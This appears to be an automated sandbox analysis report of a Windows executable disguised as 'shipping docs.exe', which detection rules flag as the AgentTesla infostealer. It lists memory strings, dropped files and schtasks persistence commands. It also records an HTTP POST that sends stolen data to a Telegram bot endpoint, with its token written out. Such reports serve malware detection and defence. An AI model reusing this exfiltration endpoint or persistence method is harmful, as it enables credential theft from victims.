Source: shipping docs.exe, 00000000.00000003.241799498.00000000054AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cnu-h
Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/$
Source: shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/=
Source: shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y
Source: shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/O
Source: shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/ko
Source: shipping docs.exe, 00000000.00000003.239908062.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240179699.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240220486.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239881609.0000000005491000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240113755.0000000005493000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.s.$
Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240049534.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239908062.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240150934.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240179699.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240220486.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239973997.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240136652.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239881609.0000000005491000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239942097.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240113755.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240076834.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: shipping docs.exe, 00000000.00000003.239908062.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240179699.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240220486.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239881609.0000000005491000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240113755.0000000005493000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.comteP$
Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: shipping docs.exe, 00000000.00000003.241289310.0000000005479000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.krT
Source: shipping docs.exe, 00000000.00000003.241289310.0000000005479000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.krigh
Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240459510.000000000548B000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240423951.000000000548B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: VMqTMMD.exe, 00000015.00000002.533512375.00000000031B2000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534481256.00000000031E8000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534906198.0000000003201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://JIQ1JKgQReGyOBe.com
Source: shipping docs.exe, 00000003.00000002.534292549.0000000003336000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.537543749.000000000349A000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534577687.00000000031EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: shipping docs.exe, 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/
Source: VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/1644584536%discordapi%yyy
Source: shipping docs.exe, 00000003.00000002.534292549.0000000003336000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.537543749.000000000349A000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534577687.00000000031EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendDocument
Source: shipping docs.exe, 00000003.00000002.534292549.0000000003336000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.537543749.000000000349A000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534577687.00000000031EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org4
Source: shipping docs.exe, 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www

Source: unknown

HTTP traffic detected: POST /bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad24f67b2ac65Host: api.telegram.orgContent-Length: 1006Expect: 100-continueConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: api.telegram.org

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49701 version: TLS 1.2

Source: VMqTMMD.exe, 0000000E.00000002.340414070.00000000010F8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.0.shipping docs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 3.0.shipping docs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.shipping docs.exe.35d2730.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.shipping docs.exe.35d2730.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.shipping docs.exe.35d2730.0.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.shipping docs.exe.35d2730.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000003.00000000.262419819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: shipping docs.exe PID: 2400, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: shipping docs.exe PID: 3776, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown

.NET source code contains very large array initializations

Source: 3.0.shipping docs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b3C2C41D0u002d332Cu002d4962u002d9787u002d6AE70BED21B1u007d/u003373B1236u002d2AE2u002d49F0u002d9CFAu002dD6A6068282F0.cs

Large array initialization: .cctor: array initializer size 10969

Source: shipping docs.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 3.0.shipping docs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 3.0.shipping docs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0.2.shipping docs.exe.35d2730.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.shipping docs.exe.35d2730.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0.2.shipping docs.exe.35d2730.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.shipping docs.exe.35d2730.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000003.00000000.262419819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: shipping docs.exe PID: 2400, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: shipping docs.exe PID: 3776, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: VMqTMMD.exe PID: 1280, type: MEMORYSTR	Matched rule: webshell_jsp_generic_base64 date = 2021/01/24, author = Arnim Rupp, description = Generic JSP webshell with base64 encoded payload, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 1b916afdd415dfa4e77cecf47321fd676ba2184d

Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 0_2_00B7E2D8
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 0_2_00B7E2C8
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 0_2_00B7BFC4
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 0_2_04483635
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 0_2_04480040
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 0_2_044813D0
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 0_2_04485C18
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 0_2_04481658
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 0_2_04481668
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 0_2_04486628
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 0_2_04480800
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 0_2_04480006
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 0_2_04480810
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 0_2_044810A1
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 0_2_044810B0
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 0_2_044813C1
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 0_2_04A465B8
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 0_2_04A465A9
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_02DFFA00
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_02DF6C00
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_061F7E1A
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_061F8818
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_061F0040
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_061F0910
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_061F29F8
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_066F0040
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_066F1850
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_066F7010
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_066FA8B8
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_066F4168
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_066F89A0
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_066F6FBD
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_066FCC28
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_066F4018
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_0684F240
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_0684C7C8

Source: shipping docs.exe, 00000000.00000002.265751138.00000000024F8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMajorRevision.exe< vs shipping docs.exe
Source: shipping docs.exe, 00000000.00000002.265489624.0000000002481000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename8c0e5951-f0e7-4ebf-a643-3c2760ac7891.exe4 vs shipping docs.exe
Source: shipping docs.exe, 00000000.00000002.282085594.0000000006EF0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMajorRevision.exe< vs shipping docs.exe
Source: shipping docs.exe, 00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename8c0e5951-f0e7-4ebf-a643-3c2760ac7891.exe4 vs shipping docs.exe
Source: shipping docs.exe, 00000000.00000000.236877884.00000000001D6000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameV3VSkFfg.exe8 vs shipping docs.exe
Source: shipping docs.exe, 00000003.00000002.503928846.0000000000DD8000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs shipping docs.exe
Source: shipping docs.exe, 00000003.00000000.262634318.0000000000438000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilename8c0e5951-f0e7-4ebf-a643-3c2760ac7891.exe4 vs shipping docs.exe
Source: shipping docs.exe	Binary or memory string: OriginalFilenameV3VSkFfg.exe8 vs shipping docs.exe

Source: shipping docs.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: yVGAJfiVEvtg.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: VMqTMMD.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: shipping docs.exe	ReversingLabs: Detection: 73%
Source: shipping docs.exe	Virustotal: Detection: 47%

Source: C:\Users\user\Desktop\shipping docs.exe

File read: C:\Users\user\Desktop\shipping docs.exe

Jump to behavior

Source: shipping docs.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\shipping docs.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\shipping docs.exe C:\Users\user\Desktop\shipping docs.exe
Source: C:\Users\user\Desktop\shipping docs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp7934.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\shipping docs.exe	Process created: C:\Users\user\Desktop\shipping docs.exe {path}
Source: unknown	Process created: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe "C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe "C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe"
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmpF5B7.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process created: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe {path}
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp3418.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process created: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe {path}
Source: C:\Users\user\Desktop\shipping docs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp7934.tmp
Source: C:\Users\user\Desktop\shipping docs.exe	Process created: C:\Users\user\Desktop\shipping docs.exe {path}
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmpF5B7.tmp
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process created: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe {path}
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp3418.tmp
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process created: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe {path}

Source: C:\Users\user\Desktop\shipping docs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Source: C:\Users\user\Desktop\shipping docs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\shipping docs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\shipping docs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\shipping docs.exe

File created: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe

Jump to behavior

Source: C:\Users\user\Desktop\shipping docs.exe

File created: C:\Users\user\AppData\Local\Temp\tmp7934.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/9@3/2

Source: C:\Users\user\Desktop\shipping docs.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: shipping docs.exe, 00000003.00000002.533196722.00000000032F7000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.536517685.000000000345B000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.533441099.00000000031AD000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: shipping docs.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\shipping docs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\shipping docs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4404:120:WilError_01
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Mutant created: \Sessions\1\BaseNamedObjects\FlPBfsykXUODZXqmIBIomiteD
